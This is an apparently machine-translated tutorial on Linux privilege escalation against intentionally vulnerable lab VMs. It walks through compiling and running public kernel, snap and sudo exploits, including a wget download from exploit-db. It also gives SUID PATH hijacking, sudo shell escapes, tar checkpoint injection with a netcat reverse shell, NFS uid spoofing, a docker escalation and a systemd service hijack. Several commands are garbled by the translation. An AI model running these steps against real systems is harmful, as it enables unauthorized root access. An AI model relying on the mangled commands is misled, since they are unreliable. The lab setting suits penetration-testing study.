The article directories

  • Introduction to the
    • Summary of Common Commands
  • Drone environment
  • Linux entitlement method
    • Linux entitlement vulnerability exploitation
      • Dirty COW CVE-2016-5195 Vulnerability
      • CVE – 2019-7304 holes
      • CVE – 2019-13272 holes
      • CVE – 2021-3156 holes
    • Linux environment variables
      • File special permission utilization
      • View hidden files
    • Sudo permission abuse
    • Scheduling task assignment
      • Write the parameters in the file name
    • Low permission access to the network file system
      • Unauthorized write
    • Docker to ask right
    • Systemd Configures rights lifting
      • Systemd profile
      • Systemd mention right

Introduction to the

You are advised to be familiar with the commands used in Linux information collection and penetration testing.

Summary of Common Commands

Common commands are briefly mentioned here

The command role
uname -a View all system information
ifconfig -a View all network information
ps auxorps -elf Viewing Process Information
idwhowlast Viewing User Information
crontab -l View the scheduled tasks of the current user

Drone environment

For the following weights, I will mainly use two target planes

  1. Owasp_broken_web_apps_vm_1.2 (Default username account:rootPassword:owaspbwa) Download address:Sourceforge.net/projects/ow…
  2. Lin.security_v1.0 (default username Account:bobPassword:secret)Download address: www.vulnhub.com/entry/linse…

If you feel slow to download the official website, you can download the link from my Baidu web disk: pan.baidu.com/s/1uq-wQUIs… Extraction code: PANX

The owASP_BROKEN_web_apps_vm_1.2 environment uses the root user by default, so I have added a new user to it.

# add user xunmi and set the default command line to bash.
useradd -s /bin/bash -m xunmi
# set password for xunmi user (recommend setting a simple password for our own use)
passwd xunmi
# create xunmi home directory
mkdir /home/xunmi
# Transfer permissions to Xunmi
chown -R xunmi:xunmi /home/xunmi
Copy the code



There are some problems with the default keyboard and network environment of the security_v1.0 environment, so we need to configure it.

# select * from user root where user root is used.
sudo awk 'BEGIN {system("/bin/bash")}'
# Modify the keyboard layout
# Default \ symbol is shift+2
vim /etc/default/keyboard
# change XKBLAYOUT to us
Run the following command to restart the service
setupcon
Configure the nic.
vim /etc/netplan/50-cloud-init.yaml
Change enp0S3 to ENS33
Exit the configuration and restart the service
netplan apply
# Cut back to our regular users for convenience after lifting weights test
su - bob
Copy the code

Linux entitlement method

Right raising refers to a method of changing from a user with low permission to a user with high permission. So we need to at least make sure we’ve got low-access users on the target machine. Linux Vulnerability Information Collection: (github.com/SecWiki/lin…)

Linux entitlement vulnerability exploitation

Dirty COW CVE-2016-5195 Vulnerability

Major impact range :Linux kernel => 2.6.22 to 3.9 (x86/ X64) Vulnerability Detection: uname -a Check whether the Linux kernel is in this range. Download address: github.com/FireFart/di… Using the target machine: OWASP_BROKEN_web_APPS_vm_1.2 First we download the attack payload to the target machine

# https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c, this is against load file, if the file into the target machine on your own! The shell terminal I use (FinalShell) has a very convenient drag-and-drop import.
GCC dirty. C -o dirty GCC dirty. C -o lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
Grant permissions to generated files
chmod 777 dirty
# Run the file (followed by the desired password! This password replaces the password of the target root user.. / dirty passwordSelect * from 'root' where 'user' = 'root'; select * from 'root' where 'user' = 'root'
su -
Remember to restore the password file when you're done
mv /tmp/passwd.bak /etc/passwd
Copy the code

CVE – 2019-7304 holes

This is a Linux package manager SNAP local entitlement vulnerability, targeting some Ubuntu systems

Ubuntu Version: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS Snap Version: 2.28 < SNAPd < 2.37

Vulnerability detection: snap –version Check whether the current version is within the specified range attack payload: github.com/initstring/… (v1: send the target key to the specified email address, v2: create a dirty_sock user with all sudo permissions!)

# here we use version V2
# empowerment first
chmod 777 dirty_sockv2.py
# in the use of
python3 dirty_sockv2.py
You can log in to the dirty_sock user (password is also dirty_sock)
su - dirty_sock
You can use sudo to run any command as the root user.
sudo su
Copy the code

CVE – 2019-13272 holes

Main scope of impact :Linux kernel => 4.10 ~ 5.1.17 Attack payload description mainly for the following versions of the system can be raised (I do not currently have the target of the following systems, so I did not reproduce this vulnerability)

// -ubuntu 16.04.5 kernel 4.15.0-29-generic // -Ubuntu 18.04.1 kernel 4.15.0-20-generic // -Ubuntu 19.04 kernel 5.0.0-15-generic // – Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic // – Linux Mint 19 kernel 4.15.0-20-generic // – Xubuntu 16.04.4 kernel 4.13.0-36-generic // – ElementaryOS 0.4.1 4.8.0-52-generic // – Backbox 6 kernel 4.18.0-21- Generic // – Parrot OS 4.5.1 kernel 4.19.0-parrot1-13T-amd64 // – Kali kernel 4.19.0-kali5-amd64 // – Redcore 1806 (LXQT) kernel 4.16.16-redcore // -mx 18.3 kernel 4.19.37-2~mx17+1 // -RHEL 8.0 kernel 4.18.0-80.el8.x86_64 // – Debian 9.4.0 kernel 4.9.0-6-amd64 // -debian 10.0.0 kernel 4.19.0-5-amd64 // -devuan 2.0.0 kernel 4.9.0-6-amd64 // – SparkyLinux 5.8 kernel 4.19.0-5- AMd64 // – Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64 // – Manjaro 18.0.3 kernel 4.19.23-1-manjaro // – Mageia 6 kernel 4.9.35-desktop-1.mga6 // – Antergos 18.7 kernel 4.17.6-1-arch

Attack payload: www.exploit-db.com/exploits/47… Download it at https://www.exploit-db.com/download/47163

Download the attack payload
wget https://www.exploit-db.com/download/47163 -O exp.c
# compile the target
gcc exp.c -o exp
# Start lifting rights
./exp
Copy the code

CVE – 2021-3156 holes

Sudo 1.8.2~1.8.31 P2, SUDO 1.9.0~1.9.5 P1

Vulnerability detection:sudoedit -s /Error messagesudoeditThis risk may exist at the beginning if theusageAt the beginning, there is no risk. In addition to these two cases, there may be an error due to the lack of permission to use sudo!



Download address: Github.com/blasty/CVE-…

The conditions for using this vulnerability are relatively strict. First of all, we need users to have certain sudo permissionssudo -lSecondly, a security mechanism of Linux also has a great impact on the exploitation of this vulnerability. This security mechanism causes the service to be in a different memory area each time it is started. However, this vulnerability can only be exploited by knowing the memory offset of our SUdo service. The exploit script below allows us to use brute force to find Sudo’s location.

Download address: Github.com/lockedbyte/…

This script is also relatively simple to use, but it should be noted that this script should be written in the Windows environment, I uploaded to Linux when there are some coding problems, hint/bin/bash^M: bad interpreter: No such file or directoryIf you have similar problems, you need to change the code first

# First vim opens the file we need to execute
vim exp.sh
# Edit file, execute
:set ff=unix
# exit edit
:wq
Run the script
./exp.sh
Copy the code

The script will then begin the exhaustive attack.

Linux environment variables

View all environment variables
export
View the environment variable path
echo $PATH
Copy the code

The commands we use in Linux are executable files, and the Linux system uses the path specified by these environment variables to quickly locate the commands we want to execute. For example, if I want to execute an ls command, we actually execute the /bin/ls executable file, and the system relies on the path we set in the environment variable /bin to find the ls and execute.



The execution is prioritized from front to back, as shown in figure 1/usr/local/sbinFind in pathls, will be used/usr/local/sbinIn the pathlsRather than/binIn the. And we mainly need to use this feature to complete the weight lifting.

Add environment variables temporarily (from scratch)
exportPATH = PATH:$PATH
# add to tail
export PATH=$PATHPath:Copy the code

File special permission utilization

I am inCommon Linux penetration test commandsLinux has several special permissions, which are mainly used for owner runningsetuidAnd the owner groupsetgidIf we know that the owner or owner group of the executable file that has been run by the owner or owner group has administrator rights and will call those commands, we can try to align the command to do the replacement processing to achieve the purpose of raising the rights.



So let’s say I have a file like this,

#include<unistd.h>
#include<stdlib.h>
void main(){
        setuid(0);
        setgid(0);
        system("ps");
}
Copy the code

We compiled it into an executable and gave it to the owner to execute!

GCC ps.c -O test CHmod 4777 test LS -LCopy the code



The above condition is just a test condition I set up. Under normal circumstances, if you encounter a similar situation, you can try this execution method

# find the above method of such a file
# from root (/), find owner (4000) or owner group (2000) or both owner and owner group (6000) file (f), and automatically delete all errors (2>/dev/null, 2 is all error messages,/dev/null is an empty file in Linux)
find / -perm -4000 -type f 2>/dev/null
# Detailed information version
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
Copy the code

From the owner execution file above, we can see that the target invokes the ps command, at which point we can use the environment variable to replace the file that the target wants to execute with the command that we want to execute

If the current user does not have his/her own folder, create a temporary folder in/TMP.
echo "/bin/bash" > ps
# give weights to the photoshop files we created
chmod 777 ps
# Add environment variables (currently my ps is in /home/bob!)
export PATH=/home/bob:$PATH
Copy the code



Suid command summary site (gtfobins): gtfobins.github.io/#+suid

In addition to the above use, we can also find some system commands to use, such as the following we find the owner of the execution filetasksetCommand, at this time we can use the vulnerability of this command to raise rights



Taskset Indicates the taskset command: Gtfobins. Making. IO/gtfobins/ta…

View hidden files

# Linux hidden files will be used. Start, so use ".*" to match hidden files
find / -name ". *" -type f 2>/dev/null
View the details version, and only view the hidden files in the /home path
find / -name ". *" -type f -path "/home/*" -exec ls -al {} \; 2>/dev/null 
# or
find /home -name ". *" -type f -exec ls -al {} \; 2>/dev/null 
Copy the code

Sudo permission abuse

The prerequisite for sudo abuse is that you know the plaintext password of the current logged-in user!

In Linux, most of the commands can only be used by the administrator. If you want to execute some administrator commands without logging in to the administrator account, you need to use the sudo permission. If you have all the sudo permission, you are basically the same as the Root user. usesudo -lCommand to view the permissions of the current user. The following two types of prompts are all sudo permissions and none sudo permissions respectively.



If the user you have found has all the sudo permissions, then congratulations, Bao CAI, you have a ghost. The inputsudo suCommand to get root, but normally I wouldn’t be so lucky.

Most of the time, we’ll probably run into something like the following that tells us what permissions the current user has to execute with sudo. If you pick up another ghost, there is/bin/bashor/bin/shSuch orders can also be directly raised power.



Sudo will most likely give the user the power, except in the case of a ghost picked up abovefindPermissions are easy for users to find, orftp.git“And so on.

Collection of Option Orders Website (GTFobins): gtfobins.github.io/#+sudo

For example, we usefindRight to mention

# https://gtfobins.github.io/gtfobins/find/#sudo
# in the current directory (.) Run (-exec)/bin/bash and exit (-quit); Means to execute another command,\ is; The escape character of
sudo find . -exec /bin/bash \; -quit
# socat will also work, and I won't demonstrate the rest
# stdin is standard input
sudo socat stdin exec:/bin/sh
Copy the code

Scheduling task assignment

When we get a low-privileged user, we usually check to see if they have a scheduled task, as shown below

# Check the scheduled tasks in the current system
cat /etc/crontab
# Check the file type (shell script is best)File Execution file of the scheduled task# Check current file permissionsLs -l Execution file of the scheduled taskCopy the code



First of all, we can see that there is a scheduled task executed every minute in the system, and this scheduled task is a script, but we only have the read permission of this script

This scheduled task compresses and backs up all subdirectories in the home directory/etc/backupsIn the directory

Write the parameters in the file name

To exploit this vulnerability we need to know a feature of Linux if we have a name forParameters -File, and the original parameters conflict! As shown below, I created a file named--helpFile, but I usecat --helpUnable to view the file, the help command is triggered.



Here we use MSF to generate a local rebound command

This command generates a rebound shell commandMsfvenom -p CMD/Unix /reverse_netcat lhost=127.0.0.1 lport=8888 RIf you do not execute the above command, you can use my generated commandmkfifo /tmp/mpuo; Nc 127.0.0.1 8888 0 < / TMP/mpuo | / bin/sh > / TMP/mpuo 2 > &1; rm /tmp/mpuoCopy the code

In the above scheduled task, we found that our current user’s directory is among the files that are regularly backed up

# A scheduled task for each execution
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
/home = /home = /home = /home = /home = /home = /home = /home = /home = /home
for i in $(ls /home)
# Then the CD goes to Bob's home directory
cd /home/bob
Back up all files in Bob's home directory.
/bin/tar -zcf /etc/backups/home-bob.tgz *
Copy the code

Exploit:

Write the generated local rebound shell command to the script
echo "mkfifo /tmp/mpuo; Nc 127.0.0.1 8888 0 < / TMP/mpuo | / bin/sh > / TMP/mpuo 2 > &1; rm /tmp/mpuo" > shell.sh
Execute a script
echo > "--checkpoint=1"
# execute the script target (execute the shell script, the bounce command we generated above)
echo > "--checkpoint-action=exec=sh shell.sh"
After the above command is created, the package command will look like the following when the backup package is executed again
# tar -zcf /etc/backups/home-bob.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh shell.sh
# Listen to our rebound interface
nc -lvvp 8888
Copy the code

Low permission access to the network file system

Network File System(NFS) allows computers on a Network to share resources over a TCP/IP Network. In NFS applications, the local NFS client application can transparently read and write files on the remote NFS server, just like accessing local files. Similar to networking in Windows, this function is enabled on port 2049 by default. We can use the following nmap command to find the target machine

nmap -sS -T4 -p- Destination addressCopy the code

Install the NFS service
apt-get install nfs-common
Read permissionsShowmount -e Indicates the destination address# Mount localMount Destination address: directory to be mounted remotely Local directoryCopy the code



Once the mount is complete, we can see the target file, but we don’t have write permission to this directory because my super admin user is compressed to an anonymous user.

Unauthorized write

If we first write files to the host of the other party, we can forge the user of the host of the other party to achieve this. Firstly, according to the above information obtained when we map files, the target mapping file belongs to Peter user, and the uid and GID of this user are 1001 and 1005. We create a similar user locally

Select * from user where username = 'Peter' and username = '1005';
groupadd -g 1005 peter
Create Peter user and add it to Peter group
adduser peter -uid 1001 -gid 1005
# Check Peter's information
cat /etc/passwd |grep peter
Copy the code



The file can then be written to the target machine

Docker to ask right

Prerequisite: 1. The target machine belongs to docker group. 2.

After the preceding conditions are met, you only need to enterdocker run -v /:/hostOS -i -t chrisfosterelli/rootpleaseYou can try to lift the right

Systemd Configures rights lifting

Systemd profile

In many previous versions of Linux, the service was associated with the init process, which was started by typing the following command

# assume that the apache2 service is started here
sudo /etc/init.d/apache2 start 
# or
service apache2 start
Copy the code

The init process is inefficient because it is designed to use serial startup and is only responsible for starting service scripts. Systemd exists to solve these problems. Systemd is not a command, but a set of commands to manage the system. Systemctl is the main command of Systemd

Restart the system
$ sudo systemctl reboot
# Shut down the system and power off
$ sudo systemctl poweroff
Check the startup time
$ systemd-analyze 
Copy the code

Systemd mention right

In fact, the systemd privilege is similar to the file special privilege mentioned above. First, we still need to find a target that can be executed with the super administrator province, which I use here/lib/systemd/systemUnder thedebug.serviceBecause we are currentlypeterThe user is aligned with writable permissions.



View this service configuration can be seen, the current service will be super administrator (root) province to execute a file, then we just change the target file we want to execute the command, and restart the service can!

Go back to the user's home directory
cd ~
# escape \n like character (-e), copy /bin/bash to /home/peter/admin console, and give it 6755
Save it in an 'administrator console.sh' file and give it execution permission
echo -e '#! /bin/bash \ NCP /bin/bash /home/pett/admin console \nchmod 6755 /home/pett/admin console '> /home/peter/Administrator console sh && chmod +x Administrator console shModify the debug configuration file
vim /lib/systemd/system/debug.service
# ExecStart= assign to/home/peter/Admin console. shCopy the code



But after the restart of the service on the need for other means, is not in line to wait for the administrator that day to restart the system! After a reboot, we should see something like the followingAdministrator consoleThis is not a direct executionAdministrator consoleInstead, we need to execute/ Administrator console -pTo obtain root privileges!